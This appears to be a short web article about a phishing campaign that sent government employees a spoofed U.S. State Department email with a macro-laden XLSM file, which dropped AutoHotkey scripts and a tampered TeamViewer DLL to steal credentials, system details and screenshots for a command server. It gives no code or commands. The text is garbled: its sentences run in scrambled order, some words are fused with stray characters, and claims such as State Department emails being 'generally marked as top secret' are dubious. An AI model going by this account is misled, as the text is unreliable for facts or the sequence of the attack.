This allowed the attacker to replace the genuine TeamViewer with the manipulated version. DLL in order to take over the control of the software. The attacker hid the genuine TeamViewer interface while the TeamViewer software with malicious ‘htv.ahk’ was being run. Htv.ahk: A malicious version of TeamViewer is downloaded, executed on victim’s system and login credentials are sent to the C&C server. Hinfo.ahk: Victim’s username and computer information is sent to the C&C server.
Hscreen.ahk: This script takes the screenshot of the victim’s personal computer and upload it on the C&C server. These three scripts affect user’s system in different ways. There are three different kind of malicious AHK scripts including ‘hscreen.ahk’, ‘info.ahk’ and ‘htv.ahk’. How did the attacker successfully deploy the attack? The other one was the corrupted AutoHotkeyU32.ahk which is an AHK script used to communicate with C&C server and to download the additional script and execute it. The first one was the genuine AutoHotkeyU32.exe program. Once the victim opened and enabled macro in the decoy document, two files were extracted from the hex encoded cells in the XLSM document. department of state are generally marked as top secret. The email had a malicious XLSM attachment with embedded macro.Įmployees were duped by the malicious email since the emails coming from the U.S. Department of State was delivered in the inbox of the government employees and had ‘Military Financing Program’ as its subject line. This mala fide software can steal sensitive data and money from even government and financial networks.Ī malicious email posing to be sent from the U.S. The software was manipulated by adding malicious TeamViewer DLL to the original software. The motive behind the attack is probably financially driven. TeamViewer is one of the most popular tools for the remote access of desktop, desktop sharing, file transfer between systems, web conferencing etc. The attacker who was responsible for this attack is a Russian speaking man. Government agencies were in a state of shock when they realized that their systems have been compromised with the malicious TeamViewer software.
0 kommentar(er)
